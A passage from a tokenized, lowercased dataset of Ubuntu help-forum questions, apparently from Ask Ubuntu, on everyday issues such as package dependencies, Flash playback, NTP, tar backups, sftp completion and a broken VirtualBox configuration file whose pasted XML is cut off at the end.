-rw-r -- r -- 1 root root 473 2010-04-14 05:33 chk_rel.php -rw-r -- r -- 1 root root 181 2008-12-10 03:00 config.footer.inc.php ... . if i understand correctly , this should work . but it does n't . i expected installing from the repositories would be a lot faster . but it does n't work . the ubuntu wiki pages have no information about a 403 forbidden error . i 'm surprised that this is so difficult ... so obviously i 'm doing something wrong . help ! : )
14478	identifying and downloading dependency for an offline pc	my pc have no internet connection . i am using ubuntu 10.10 netbook edition . i always download the package from another pc having net connection into my pendrive and when i try to install a package it always shows that dependency is required . how can i solve this problem ? is there any command in ubuntu so that i can see all the dependency along with corresponding url to download of a particular package ?
14481	why does my flash video get stuck ? ( not lag ? )	after moving to ubuntu 10.10 netbook edition , i 've noticed a strange problem that manifests itself most obviously with streaming videos like youtube and hulu . the video will load and begin playing fine and eventually stop , as though it is buffering . however , it usually happens between 40 and 60 seconds into the clip . the loading indication however shows that it actually is n't buffering anymore of the data , and will just sit there . if i force the clip forward ( e.g . click to start the movie somewhere ahead of the stall point ) the clip will usually reload quickly and begin playing as expected . because of the quick load times , and the consistent stop of video , i do n't think the problem is related to hardware performance or network throughput . also , i have none of these problems in 10.04 . rebooting into 10.04 makes the problem disappear . however , one more clue , i also have noticed a higher occurrence of web pages that simply `` stop loading '' - say , 1/10 clicks while browsing i have to hit `` reload '' to get the page to load because the page timed out part of the way through . this seems strangely related to the video problem , though is a lot less infuriating . help ! where do i begin to look with a problem like this ?
14482	any way to clean up the look of the shutdown/logout/restart process ?	so , i 've given up trying to configure my system ( ubuntu 10.10 , open source ati drivers ) to shutdown/logout/restart gracefully . whenever i do any of the three , all i get is an ugly ubuntu logo with console text running over it . it does shutdown quickly , and i love that . it just looks awful while it does it . is there a way to just have nothing displayed when i click shutdown/logout/restart ? for example , is there a command that can disable the screen that i can put somewhere in some configuration file that will be the absolute first thing that is executed when i select shutdown/logout/restart ? i know of the xset dpms force off command which does turn the display off , but moving the mouse at all or pressing any key will turn it back on again . is there a command that can disable the screen and disable any input that i can place somewhere that will be the first thing that is executed when i select shutdown/logout/restart ?
14484	remote desktop viewer does n't update the image	i am trying to use the remote desktop viewer on my laptop to connect to my desktop , which i have configured with remote desktop preferences . but it fails to update the screen shot image , making it useless . what can i do to speed it up and actually have usable remote desktop ? any applications i can install on either/both sides to do it ?
14487	how to reset the terminal properties and preferences ?	i fooled around with the colors and stuff , in the terminal , and now want to go back to the maroon and white default config of the the terminal . what files do i have to delete ?
14495	missing home folder content after update	after finishing ubuntu update , i rebooted my pc . after logging in i noticed that my home folder is missing . what should i do now ?
14497	syncing music with ubuntu one	if i want to make use of ubuntu one 's mobile streaming service , how do i add ( my own ) music to ubuntu one ? i mean , if i purchase music through the music store , the music automatically get synced . but how ( or rather where ) do i add my own collection for synchronization ?
14503	cleaning up my home directory	i have the following problem , i 've installed a bunch of ubuntu packages ever since i used ubuntu , now i 've removed these packages using the synaptic package manager but somehow it still left hidden folders in my home directory for the specific applications i uninstalled , taking up unnessesary diskspace . eg . .netbeans and .amarok etc is there a way to detect these folders that are no longer in use automatically and delete them ?
14511	core i7 with 4gb - go 64 bit or stay 32bit.. ?	i have a core i7 laptop with 4gb ram . in windows , the disadvantage of using the 32bit os would be that a single app could not use more than 2gb of ram ( + the 2gb shared kernel-space memory ) except when setting a boot switch which reduces the amount of shared kernel memory , then it 's 3gb max per app . what disadvantages/limitations would i have in ubuntu for sticking to the 32bit os ? ( if any ? ) - as i only have 4gb of ram , i ca n't see why i need to use the 64bit version ?
14518	video editor with bubble annotations	i use the annotations feature of youtube a lot , but i want to get away from flash and start hosting my videos using html5 . so i need to create those bubbles and embed them in the video using an editor . is there an easy way to do that or a video editor that has such feature ?
14519	wireless card only starts to work if i boot into windows	i 'm facing a very weird problem with my wireless network card in ubuntu 10.10 ! recently i have installed ubuntu 10.10 beside my windows xp on my dell xps 1330 laptop . everything worked fine except my wireless network . i tried to activate the wireless driver recommended in `` ubuntu additional drivers '' utiltity , but it did n't work . next , i installed `` ndiswrapper-utils '' using `` synaptic package manager '' and installed my windows wireless driver using `` windows wireless driver '' utility ! now it is sometimes working fine , sometimes not ! ! the weird thing is that whenever my ubuntu does n't recognize my wireless network and i restart my computer to my windows xp ; my windows does n't recognize the wireless networks too ! in this situation if i restart my windows , the problem still is n't solved but if i standby my windows and come back , the problem is solved in both windows and linux ! ! ! it means that whenever my ubuntu does n't recognize my wireless network , i have to restart in my windows and stanby for once and come back in my ubuntu ! ! ! : d 09:00.0 ethernet controller : broadcom corporation netlink bcm5906m fast ethernet pci express ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 )
14535	whats the .local folder for in my home directory	what is the ~/.local folder good for and is it safe to remove the content within this folder ?
14537	looking for a commercial grade sip softphone	i use a commercial asterisk-based sip provider for my business . i 'm going through the process of acquiring hearing aids , and it may be smartest for me to stream telephone audio from my provider directly to my aids via bluetooth and a softphone ( i spent a lot of time on the phone ) . i could conceivably use my android handset , but it seems k , ind of clunky . i used to use x-lite under windows , but the linux version is very rough comparatively . i 've also tried xoiper , but find the interface pretty rough . i want something that 's close to a phone dialing and usage wise . counterpath makes bria and eyebeam , which are more contemporary then x-lite , but there is apparently no way to try them out ( i would be open to buying one if that made sense ) . any recommendations are appreciated .
14539	7zip error - can not open output file	i am trying to unzip a 7zip file from the command line like this , but i get an error with using e or x parameters . the file has only 1 .dat file inside . i get the following error . valugi @ valugi-desktop : / $ 7z x /var/www/site/data/7zip/eu/ processing archive : /var/www/site/data/7zip/eu/file.7z can not open output file file.dat skipping file.dat sub items errors : 1 i can open the file if i am opening it with the file roller desktop application , but i want to use the command line , as i want to integrate this into a php script . how can i find out what is generating this error and how can i fix it ? thanks
14542	are there any `` traps '' in cloning a virtualbox vm for concurrent use on the same host/lan ?	with ubuntu as the host , i want to run two similar/identical ( ? ) instances of a virtualbox guest on the same host , or perhaps on another host which is on the same lan ... i have set up a guest as a `` base '' for the two clones . i have exported it as an ovf appliance . i 've imported this `` base '' guest os back into virtualbox , with a unique name and .vdk ... and i have started them both on the same host , and all seems okay , but i do wonder if i have missed some significant point . ... eg . is the virtual nic the same ? this would throw the lan into confusion ( i think ) ... and what about uuids ? i have n't actually tried 2 clones together , yet ... only the original and one clone , but i have n't gone beyond a simple startup ...
14544	can not run gcompris	i installed gcompris on ubuntu 10.10 and when i tired to run it , it exited immediately . i ran it from shell giving the command gcompris and got the folowing message . akn @ ubuntu : ~ $ gcompris ** message : binary relocation disabled ** ( process:20588 ) : warning ** : exec_prefix none package_data_dir = /usr/share/gcompris/boards package_skin_dir = /usr/share/gcompris/boards/skins package_menu_dir = /usr/share/gcompris/boards package_locale_dir = /usr/share/locale package_plugin_dir = /usr/lib/gcompris package_python_plugin_dir= /usr/share/gcompris/python infos : config dir '/home/akn/.config/gcompris' users dir '/home/akn/my gcompris' database '/home/akn/.config/gcompris/gcompris_sqlite.db' ( gcompris:20588 ) : gtk-critical ** : ia__gtk_window_set_type_hint : assertion ` ! gtk_widget_get_mapped ( gtk_widget ( window ) ) ' failed segmentation fault akn @ ubuntu : ~ $
14548	why suspend / hibernate does not work ? ( blank screen problem )	i 've got a problem with ubuntu 10.10 suspend / hibernation . when i try to do one of these actions , computer prepares but in the end a blank screen comes up with just a single underscore blinking . computer becomes unresponsive to mouse/keyboard and only pressing power button on chasis restores it . disks and coolers are working during the suspend / hibernation as if nothing happened . can anyone give me some advice how to solve it ? thank you .
14550	apt-get upgrade segfault !	i installed ubuntu server 10.04 and booted as normal . some time later , i booted the server and tried to install a new package/upgrade the existing packages using : sudo apt-get upgrade sudo aptitude safe-upgrade sudo apt-get install ntp reading package lists ... done segmentation faulty tree ... 50 % i checked the system log /var/log/messages and found these entries : kernel : [ 5586.184028 ] apt-get [ 3864 ] : segfault at 7fb5e078477b ip 00007fb5da82223c sp 00007fffa943b430 error 6 in libapt-pkg-libc6.10-6.so.4.8.0 [ 7fb5da7e1000+c5000 ] kernel : [ 5682.494467 ] aptitude [ 3973 ] : segfault at 7f06d4c4d77b ip 00007f06d063723c sp 00007fff5feb8540 error 6 in libapt-pkg-libc6.10-6.so.4.8.0 [ 7f06d05f6000+c5000 ] kernel : [ 5991.238428 ] apt-get [ 4181 ] : segfault at 7f809c17e77b ip 00007f809621c23c sp 00007fff740deb30 error 6 in libapt-pkg-libc6.10-6.so.4.8.0 [ 7f80961db000+c5000 ] also , i got the same error while trying to use aptitude safe-upgrade as it is clear from the log file . how can this be fixed without system re-installation ?
14551	what does . : mean in php include_path ?	i 'm trying to install zend on a machine running xampp . zend 's help file says that in order to set up the command-line tools , i need to make sure that the contents of the /library directory are placed inside my php include_path specified directory . when i look at my php.ini , include_path is commented out , but the value looks like this : ; unix : `` /path1 : /path2 '' ; include_path = `` . : /php/includes '' where exactly is the include_path pointing to ? i 'm pretty new to linux , and have never seen . : as part of a file path .
14555	what is the difference between indicators and a system tray ?	what is so new about indicators ? what did we have before ? are there technical or usability differences ?
14558	how do i setup a local ntp server ?	i installed ntp server on ubuntu server 10.04 using : sudo apt-get install ntp the ntp daemon seems working and listening on the 123 port . however , i was not able to get the time from another machine : sudo ntpdate -u my_ntp_server 23 nov 18:48:41 ntpdate [ 2990 ] : no server suitable for synchronization found is there any necessary configurations to do ?
14561	after upgrade from 10.04 to 10.10 , no keyboard , can not login	just did upgrade from kubuntu 10.04 to 10.10.. after all done and reboot , when the login box shows up , my keyboard and laptop pad ( mouse ) dos n't work , ( plugged in the usb mouse , it works sometimes ) but never keyboard . i went to recovery , the boot hung up when it says : [ 17.704053 ] ext4-fs ( sda9 ) : mounted filesystem with ordered data mode begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... done . stuck here . nothing works except ctrl+alt+del i tried booting from livecd and update-grub , also tried booting manually from grub command line , everytime it stuck at lines above .. so it 's not grub problem . how to solve this ? if it is important , i have ati mobility radeon hd 5470 card .
14562	firefox freezes laptop	i have an hp dv5000 which is having a problem with ubuntu 10.04 and 10.10 . i experience intermittent complete system freezes the only solution to which is to do a hard restart . it appears to be related to firefox ( it is always running when the problem occurs and frequently some random action in firefox will be the precipitating event ) and maybe compiz ( although turning off compiz does not fix it ) . i 've tried a couple of things to fix it ( compiz hacks which seem to be oriented toward tuning compiz for my computer ) which seem to have improved it somewhat but i still experience the problem ( just less frequently ) . any input would be appreciated .
14568	how to set graphics & resolution on frozen-bubble ?	i wanted to setup a few arcade games on my maverick box ( for the children , you know , ... : - ) ) . i really like frozen bubble but i ca n't set the graphics preferences , choosing the graphics tab in the game just gives me a little bumping indicator telling me it 's working , but nothing happens ? how to set the resolution ( maybe even fullscreen ? ) on this game ?
14584	are there any gui man page editors are available ?	i find the man page format extremely painful to write . is there a gui ( wysiwyg or wysiwym ) editor available to make this task easier ? i 'm hoping for an application that is to man pages as kompozer is to web pages . i have tried gmanedit but have found that it is basically just a text editor with some easily available snippets - it is necessary to know the man page format to use it and the editing area is just a text widget . while i 'd prefer software that is in the official ubuntu repositories , i am ok with using unsupported methods for installation such as ppas or installing from source .
14585	should i include /dev in backups ?	after searching this site , and reading the ubuntu community documentation , i 've decided to use a simple tar command such as sudo tar -cvpzf serverbackupmmddyyyy.tgz -- exclude=/proc -- exclude=/lost+found -- exclude=/mnt -- exclude=/sys -- exclude=/media -- exclude=/backups -- exclude=/boot -- exclude=/dev -- exclude=/home -exclude=/tmp -- exclude=serverbackupmmddyyyy.tgz / to backup my system . while researching how to backup my system it seemed some people recommended excluding /dev ( as i 'm doing above ) and others warned that there could be problems doing that ( but they did n't elaborate ) . what are the pros and cons of including or excluding /dev in a backup ? i tested a full backup/restore and did n't run into any problems excluding /dev myself , but i also think i took more steps than necessary to restore . after inserting a non broken hard drive i reinstalled ubuntu and then extracted the backup over the fresh install .
14586	any way to use skype without random crashes ? like another gui ?	okay here 's the deal , there is a bug about this ( or so it seems ) that i reported ( it 's been changed a lot since then ) ; skype is crashing and random/on clicks ( e.g . adding a contact ) . i 'm tired of skype , but unfortunately i do n't rule the world and i can make anyone switch . are there any alternate clients ? like something i can use to connect to skype , add contacts , and chat ? video support would be nice , but it 's optional . i know skypekit needs a payment first , so it 's unlikely anyone has made anything with it , but , i 'm desperate right now -__- ( the crashing has made me lose stuff , so i 'm a bit ... you know ) . anything that works would be greatly appreciated . i 'll use ekiga for contacts who do n't care about skype , but some wo n't switch so ekiga is off the list : p
14590	user credentials not recognised in virtual terminal	whenever i switch to a virtual terminal , using ctrl+alt+f1 etc.. it asks me for my user credentials : *computername* login : at this point i enter my username , followed by my password . however the terminal never lets me login and keeps telling me , that i have got the wrong credentials . edit : curiously if i boot up without starting x , i can log in via the command line ok , its just virtual terminals that cause problems . what am i doing wrong ?
14591	ctrl + alt + backspace does not work	my 'escape ' key sequences ( such as those used to restart x etc ) dont seem to work . for example when i press ctrl + alt + backspace which is supposed to restart x-server , nothing happens . do i need to enable these separately ?
14592	how to become a terminal pro	there are rumors . these rumors claim that there are nerd on this hell of a planet who do n't touch a mouse . they are my heroes : d how can i become such a pro ? ( i used to know a site , like stackoverflow , where you could upvote really cool commands , like twittering from terminal etc . )
14596	no sound after liquorix kernel update	i recently installed the liquorix kernel after hearing that it had the 200 line patch in the kernel . once i installed it , everything worked great and i had huge performance improvements . at that point i was using the 2.6.36-14 version . the kernel has now updated twice to version 2.6.36.-16 and now i have no sound coming from my system . alsa mixer shows that nothing is muted . how can i resolve this issue ? here is the script output file everyone requested . alsa-info.txt
14599	strange messages at boot and no plymouth	after reinstalling ubuntu a couple of days ago ( dont ask ) , ive been getting strange messages at boot up , and i dont seem to have the plymouth boot splash screen thing ( whatever the one with the ubuntu logo and the white and orange dots is ) . my computer seems to function ok , and boots up fine , it just boots straight to the gdm . the message im getting is : modprobe : fatal : could not load lib/modules/2.6.35-22-generic/modules.dep no such file or directory this is displayed twice at boot . anyone know whats gone wrong ?
14607	how to refresh indicators ?	if i add or remove an indicator ( my adding or removing a package ) i currently have to logout or restart to see the effects of my changes . how can i refresh my indicators from within my session to enable me to keep working ?
14615	how do i make the terminal run python 3.1 ?	currently , when i type `` python '' at the terminal i get v2.6 which is all fine and dandy but how can i set it to use v3.1 instead ? is there a `` path '' variable out there somewhere that i can change like windows ? edit : i already have python3 installed and up and running . i just want to know how to set it as the shells default python version .
14627	`` no symbol version for module_layout '' when trying to load usbhid.ko	i am trying to build my own module for usbhid.ko , but after i compiled , i ca n't load the module . dmesg says no symbol version for module_layout . i am wondering what is the problem ? i have already used the kernel source provided by ubuntu and i have also make sure the kernel version is the same .
14629	how do i enable the `` partner '' repository ?	i keep seeing places refer to the `` partner '' repository as a place i can get software , how can i enable this repository ? please specify how to do this graphically and via command line .
14632	what software was used to make the software center mockups ?	i was reading this ubuntu software center design document and wondering , what software was used to design all those ui concept ?
14639	is there a desktop tool for delicious.com ( aka del.icio.us ) ?	i 'm looking for a tool that would allow me to interface with my delicious bookmarks from within ubuntu . i know of the firefox plugin , but i do n't want something in the browser . i 'd also prefer that it have a gui . ( though having a cli in addition would be nice . ) all i 've found in the repos are libraries and scuttle .
14643	install without installing boot loader	i 'm trying to install ubuntu 10.10 without installing any linux boot loader ( grub , lilo etc ) . i remember prior 10.10 , there 's an option for disabling install boot loader . i could n't find this option when installing 10.10 now . please help . many thanks ! !
14645	is it possible to get tab completion with sftp ?	sometimes i need to quickly copy a file from my remote server to my local machine . here 's my current workflow : i ssh into my remote server , find the file and copy its full path . i open new terminal tab and type : sftp user @ hostname : /path/to/file ( where /path/to/file is the path i previously copied ) it 's not such a pain but it would be really nice if i could skip step 1 and find the path to the file using tab completion directly when typing the sftp command . to illustrate , i could start typing sftp user @ hostname : / press tab and get a listing of folders in / . i could then go on typing ho press tab and it would auto-complete to home , etc . etc . i 'm not sure if such a feature exists and otherwise , is it theoretically possible to write a custom tab completion script as described ? any pointers on where to start ?
14646	can not install anything in the ubuntu software center	i can not install anything in the ubuntu software center without it telling me that it 's an `` untrusted package . '' i also went to the software sources to `` reload '' but it gave me this : could not download all repository indexes the repository may no longer be available or could not be contacted because of network problems . if available an older version of the failed index will be used . otherwise the repository will be ignored . check your network connection and ensure the repository address in the preferences is correct . failed to fetch http : //ppa.launchpad.net/ubuntu-advertising/uadvt/dists/ < source.changes > /ubuntu/maverick/binary-i386/packages.gz 404 not found failed to fetch http : //ppa.launchpad.net/ubuntu-advertising/uadvt/dists/ < source.changes > /ubuntu/main/binary-i386/packages.gz 404 not found some index files failed to download , they have been ignored , or old ones used instead .
14649	how can i find the name of a package ?	i want to create links to software within software center using the apturl - however , i 'm not sure how to find out the true `` package name '' . what is the easiest way to discover a package 's name for use with the apturl or apt-get command ?
14660	enable external hd after remote reboot	ran into this one tonight : was on my laptop , and ssh 'd into my desktop to access files on my desktop 's external hd . so far , so good . however , after remotely rebooting the desktop , the external hd was disabled - i had to physically go to the desktop and log-in in order to get back on the external drive . is there a way i can set up the external hd to always be on/mounted , even if no one is actually logged in on that machine ? thanks in advance , joe
14663	how do i delete events in shotwell ?	i want to use shotwell to manage my photos ( along with other power apps like f-spot and digicam ) , for various reasons , but i have one issue . i ca n't figure out how to delete events . is this possible ( meaning i 'm missing something ) or is it not a part of the feature set ?
14666	how to move vbox virtual machine to different location along with snapshots	i have oracle virtualbox3.2 installed on ubuntu 9.10 desktop . it was working fine for a long time but suddenly today when i try to open virtualbox going to applications > system tools > it 's showing the below error message on a window : failed to create the virtualbox com object . the application will now terminate . start tag expected , ' < ' not found . location : '/home/avyakta/.virtualbox/virtualbox.xml ' , line 1 ( 0 ) , column 1 . /home/vbox/vbox-3.2.6/src/vbox/main/virtualboximpl.cpp [ 535 ] ( nsresult virtualbox : :init ( ) ) i also tried `` sudo /etc/init.d/vboxdrv setup '' but no use . the 'virtualbox.xml ' file was empty , so i removed it and i re-registered vbox again . i had to add the vdis again but it 's not taking the snapshots having specified snapshot location . so i 'm looking if there is any way i can make vdi 's and its snapshots working . edit 1 : here is my xml file of vm named karmic : < ? xml version= '' 1.0 '' ? > < virtualbox xmlns= '' http : //www.innotek.de/virtualbox-settings '' version= '' 1.10-linux '' > < machine uuid= '' { 1b896ca0-7168-400c-a5a2-f601df03b294 } '' name= '' karmic '' ostype= '' ubuntu '' currentsnapshot= '' { dd4914df-07b2-43b3-988e-531a369bf6dd } '' snapshotfolder= '' /part2/karmic9.10/snpsht '' laststatechange= '' 2010-11-30t09:05:57z '' > < extradata > < extradataitem name= '' gui/lastcloseaction '' value= '' poweroff '' / > < extradataitem name= '' gui/lastguestsizehint '' value= '' 720,400 '' / > < extradataitem name= '' gui/lastwindowpostion '' value= '' 290,248,720,450 '' / > < extradataitem name= '' gui/minitoolbaralignment '' value= '' bottom '' / > < extradataitem name= '' gui/savemountedatruntime '' value= '' yes '' / > < extradataitem name= '' gui/showminitoolbar '' value= '' yes '' / > < /extradata > < snapshot uuid= '' { dd4914df-07b2-43b3-988e-531a369bf6dd } '' name= '' snapshot 1 '' timestamp= '' 2010-11-25t08:45:09z '' > < hardware version= '' 2 '' > < cpu count= '' 1 '' hotplug= '' false '' > < hardwarevirtex enabled= '' true '' exclusive= '' true '' / > < hardwarevirtexnestedpaging enabled= '' true '' / > < hardwarevirtexvpid enabled= '' true '' / > < pae enabled= '' true '' / > < /cpu > < memory ramsize= '' 512 '' pagefusion= '' false '' / > < hid pointing= '' usbtablet '' keyboard= '' ps2keyboard '' / > < hpet enabled= '' false '' / > < boot > < order position= '' 1 '' device= '' floppy '' / > < order position= '' 2 '' device= '' dvd '' / > < order position= '' 3 '' device= '' harddisk '' / > < order position= '' 4 '' device= '' none '' / > < /boot > < display vramsize= '' 12 '' monitorcount= '' 1 '' accelerate3d= '' false '' accelerate2dvideo= '' false '' / > < remotedisplay enabled= '' false '' port= '' 3389 '' authtype= '' null '' authtimeout= '' 5000 '' > < videochannel enabled= '' false '' quality= '' 75 '' / > < /remotedisplay > < bios > < acpi enabled= '' true '' / > < ioapic enabled= '' false '' / > < logo fadein= '' true '' fadeout= '' true '' displaytime= '' 0 '' / > < bootmenu mode= '' messageandmenu '' / > < timeoffset value= '' 0 '' / > < pxedebug enabled= '' false '' / > < /bios > < usbcontroller enabled= '' true '' enabledehci= '' true '' / > < network > < adapter slot= '' 0 '' enabled= '' true '' macaddress= '' 080027f8aa0b '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < bridgedinterface name= '' eth0 '' / > < /adapter > < adapter slot= '' 1 '' enabled= '' false '' macaddress= '' 0800271e816e '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 2 '' enabled= '' false '' macaddress= '' 080027897dd1 '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 3 '' enabled= '' false '' macaddress= '' 0800272f8a63 '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 4 '' enabled= '' false '' macaddress= '' 0800270f071a '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 5 '' enabled= '' false '' macaddress= '' 080027d69053 '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < /adapter > < adapter slot= '' 6 '' enabled= '' false '' macaddress= '' 08002747e6bf '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 7 '' enabled= '' false '' macaddress= '' 0800275b2682 '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < /network > < uart > < port slot= '' 0 '' enabled= '' false '' iobase= '' 0x3f8 '' irq= '' 4 '' hostmode= '' disconnected '' / > < port slot= '' 1 '' enabled= '' false '' iobase= '' 0x3f8 '' irq= '' 4 '' hostmode= '' disconnected '' / > < /uart > < lpt > < port slot= '' 0 '' enabled= '' false '' iobase= '' 0x378 '' irq= '' 4 '' / > < port slot= '' 1 '' enabled= '' false '' iobase= '' 0x378 '' irq= '' 4 '' / > < /lpt > < audioadapter controller= '' ac97 '' driver= '' pulse '' enabled= '' true '' / > < rtc localorutc= '' utc '' / > < sharedfolders/ > < clipboard mode= '' bidirectional '' / > < io > < iocache enabled= '' true '' size= '' 5 '' / > < iobandwidth max= '' 0 '' / > < /io > < guest memoryballoonsize= '' 0 '' / > < guestproperties > < guestproperty name= '' /virtualbox/hostinfo/gui/languageid '' value= '' en_us '' timestamp= '' 1290674709753432000 '' flags= '' '' / > < /guestproperties > < /hardware > < storagecontrollers > < storagecontroller name= '' ide controller '' type= '' piix4 '' portcount= '' 2 '' usehostiocache= '' true '' > < attacheddevice passthrough= '' false '' type= '' dvd '' port= '' 1 '' device= '' 0 '' / > < /storagecontroller > < storagecontroller name= '' sata controller '' type= '' ahci '' portcount= '' 1 '' usehostiocache= '' false '' ide0masteremulationport= '' 0 '' ide0slaveemulationport= '' 1 '' ide1masteremulationport= '' 2 '' ide1slaveemulationport= '' 3 '' > < attacheddevice type= '' harddisk '' port= '' 0 '' device= '' 0 '' > < image uuid= '' { f79e6efe-d019-4a2f-8d88-95f47cb07b01 } '' / > < /attacheddevice > < /storagecontroller > < /storagecontrollers > < /snapshot > < hardware version= '' 2 '' > < cpu count= '' 1 '' hotplug= '' false '' > < hardwarevirtex enabled= '' true '' exclusive= '' true '' / > < hardwarevirtexnestedpaging enabled= '' true '' / > < hardwarevirtexvpid enabled= '' true '' / > < pae enabled= '' true '' / > < /cpu > < memory ramsize= '' 512 '' pagefusion= '' false '' / > < hid pointing= '' usbtablet '' keyboard= '' ps2keyboard '' / > < hpet enabled= '' false '' / > < boot > < order position= '' 1 '' device= '' floppy '' / > < order position= '' 2 '' device= '' dvd '' / > < order position= '' 3 '' device= '' harddisk '' / > < order position= '' 4 '' device= '' none '' / > < /boot > < display vramsize= '' 12 '' monitorcount= '' 1 '' accelerate3d= '' false '' accelerate2dvideo= '' false '' / > < remotedisplay enabled= '' false '' port= '' 3389 '' authtype= '' null '' authtimeout= '' 5000 '' > < videochannel enabled= '' false '' quality= '' 75 '' / > < /remotedisplay > < bios > < acpi enabled= '' true '' / > < ioapic enabled= '' false '' / > < logo fadein= '' true '' fadeout= '' true '' displaytime= '' 0 '' / > < bootmenu mode= '' messageandmenu '' / > < timeoffset value= '' 0 '' / > < pxedebug enabled= '' false '' / > < /bios > < usbcontroller enabled= '' true '' enabledehci= '' true '' / > < network > < adapter slot= '' 0 '' enabled= '' true '' macaddress= '' 080027f8aa0b '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < bridgedinterface name= '' eth0 '' / > < /adapter > < adapter slot= '' 1 '' enabled= '' false '' macaddress= '' 0800271e816e '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 2 '' enabled= '' false '' macaddress= '' 080027897dd1 '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 3 '' enabled= '' false '' macaddress= '' 0800272f8a63 '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 4 '' enabled= '' false '' macaddress= '' 0800270f071a '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 5 '' enabled= '' false '' macaddress= '' 080027d69053 '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 6 '' enabled= '' false '' macaddress= '' 08002747e6bf '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < adapter slot= '' 7 '' enabled= '' false '' macaddress= '' 0800275b2682 '' cable= '' true '' speed= '' 0 '' type= '' 82540em '' > < disabledmodes > < nat > < dns pass-domain= '' true '' use-proxy= '' false '' use-host-resolver= '' false '' / > < alias logging= '' false '' proxy-only= '' false '' use-same-ports= '' false '' / > < /nat > < /disabledmodes > < /adapter > < /network > < uart > < port slot= '' 0 '' enabled= '' false '' iobase= '' 0x3f8 '' irq= '' 4 '' hostmode= '' disconnected '' / > < port slot= '' 1 '' enabled= '' false '' iobase= '' 0x3f8 '' irq= '' 4 '' hostmode= '' disconnected '' / > < /uart > < lpt > < port slot= '' 0 '' enabled= '' false '' iobase= '' 0x378 '' irq= '' 4 '' / > < port slot= '' 1 '' enabled= '' false '' iobase= '' 0x378 '' irq= '' 4 '' / > < /lpt > < audioadapter controller= '' ac97 '' driver= '' pulse '' enabled= '' true '' / > < rtc localorutc= '' utc '' / > < sharedfolders/ > < clipboard mode= '' bidirectional '' / > < io > < iocache enabled= '' true '' size= '' 5 '' / > < iobandwidth max= '' 0 '' / > < /io > < guest memoryballoonsize= '' 0 '' / > < guestproperties > < guestproperty name= '' /virtualbox/hostinfo/gui/languageid '' value= '' en_us '' timestamp= '' 1290674709753432000 '' flags= '' '' / > < /guestproperties > < /hardware > < storagecontrollers > < storagecontroller name= '' ide controller '' type= '' piix4 '' portcount= '' 2 '' usehostiocache= '' true '' > < attacheddevice passthrough= '' false '' type= '' dvd '' port= '' 1 '' device= '' 0 '' / > < 